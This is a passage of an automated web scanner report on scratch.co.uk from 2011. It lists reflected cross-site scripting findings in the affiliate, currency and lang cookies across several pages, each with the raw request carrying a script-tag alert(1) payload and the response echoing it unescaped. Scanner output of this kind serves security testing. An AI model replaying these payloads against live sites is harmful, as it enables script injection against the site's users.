Cookie: affiliate=direct-173%7C193%7C214%7C243c841f"><script>alert(1)</script>c26133aa53; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c841f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec26133aa53; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c841f"><script>alert(1)</script>c26133aa53');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.155. http://scratch.co.uk/about/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /about/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 102dc"><script>alert(1)</script>b576efef7c6 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP102dc"><script>alert(1)</script>b576efef7c6;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: currency=GBP102dc%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb576efef7c6; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:55 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP102dc"><script>alert(1)</script>b576efef7c6', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.156. http://scratch.co.uk/about/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /about/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f717"><script>alert(1)</script>9b4eec3d242 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG2f717"><script>alert(1)</script>9b4eec3d242; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: lang=ENG2f717%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9b4eec3d242; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG2f717"><script>alert(1)</script>9b4eec3d242', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.157. http://scratch.co.uk/contact/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /contact/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94bc4"><script>alert(1)</script>062cf6e61a2 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24394bc4"><script>alert(1)</script>062cf6e61a2; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24394bc4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E062cf6e61a2; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24394bc4"><script>alert(1)</script>062cf6e61a2');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.158. http://scratch.co.uk/contact/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /contact/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc52"><script>alert(1)</script>4e4316f61d0 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP3fc52"><script>alert(1)</script>4e4316f61d0;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: currency=GBP3fc52%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e4316f61d0; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP3fc52"><script>alert(1)</script>4e4316f61d0', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.159. http://scratch.co.uk/contact/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /contact/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cf9c"><script>alert(1)</script>10570ae66c1 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG7cf9c"><script>alert(1)</script>10570ae66c1; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: lang=ENG7cf9c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E10570ae66c1; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG7cf9c"><script>alert(1)</script>10570ae66c1', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.160. http://scratch.co.uk/help/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f4c"><script>alert(1)</script>eaf4b62400f was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243c9f4c"><script>alert(1)</script>eaf4b62400f; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c9f4c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeaf4b62400f; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:46 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c9f4c"><script>alert(1)</script>eaf4b62400f');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.161. http://scratch.co.uk/help/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b813a"><script>alert(1)</script>e452f3eaa1a was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPb813a"><script>alert(1)</script>e452f3eaa1a;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: currency=GBPb813a%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee452f3eaa1a; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPb813a"><script>alert(1)</script>e452f3eaa1a', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.162. http://scratch.co.uk/help/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ac7"><script>alert(1)</script>f16dba27792 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGc1ac7"><script>alert(1)</script>f16dba27792; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: lang=ENGc1ac7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef16dba27792; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:23 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGc1ac7"><script>alert(1)</script>f16dba27792', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.163. http://scratch.co.uk/help/deposit/methods/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/deposit/methods/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b792"><script>alert(1)</script>7be29cfe53a was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2434b792"><script>alert(1)</script>7be29cfe53a; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2434b792%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7be29cfe53a; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2434b792"><script>alert(1)</script>7be29cfe53a');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.164. http://scratch.co.uk/help/deposit/methods/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/deposit/methods/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb9ed"><script>alert(1)</script>e3eb6fdaf26 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPfb9ed"><script>alert(1)</script>e3eb6fdaf26;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: currency=GBPfb9ed%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee3eb6fdaf26; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:32 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPfb9ed"><script>alert(1)</script>e3eb6fdaf26', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.165. http://scratch.co.uk/help/deposit/methods/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/deposit/methods/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2c6e"><script>alert(1)</script>f553ccebbf was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGa2c6e"><script>alert(1)</script>f553ccebbf; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
